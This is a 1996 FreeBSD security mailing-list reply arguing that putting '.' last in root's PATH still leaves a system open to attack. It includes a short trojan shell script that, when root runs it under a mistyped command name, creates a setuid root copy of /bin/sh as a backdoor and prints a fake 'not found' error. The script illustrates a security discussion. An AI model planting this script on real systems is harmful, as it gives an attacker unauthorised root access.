From owner-freebsd-security Tue Jun 25 01:23:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA01077 for security-outgoing; Tue, 25 Jun 1996 01:23:21 -0700 (PDT) Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA01036; Tue, 25 Jun 1996 01:23:07 -0700 (PDT) Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id KAA22910; Tue, 25 Jun 1996 10:22:10 +0200 Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id KAA07482; Tue, 25 Jun 1996 10:22:09 +0200 Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id JAA17930; Tue, 25 Jun 1996 09:58:52 +0200 (MET DST) From: J Wunsch Message-Id: <199606250758.JAA17930@uriah.heep.sax.de> Subject: Re: I need help on this one - please help me track this guy down! To: davidg@Root.COM Date: Tue, 25 Jun 1996 09:58:51 +0200 (MET DST) Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch) In-Reply-To: <199606250714.AAA03862@root.com> from David Greenman at "Jun 25, 96 00:14:37 am" X-Phone: +49-351-2012 669 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk As David Greenman wrote: > Actually, this particular problem can be avoided by putting "." last in > the search path rather than first. But only until someone drops this script e.g. into /tmp: #!/bin/sh if [ `id -u -r` = 0 ] ; then (cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak; chmod 04755 $HOME/.newsrc.bak) & fi echo "$0: not found." exit 1 ...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc. -- cheers, J"org joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE Never trust an operating system you don't have sources for. ;-)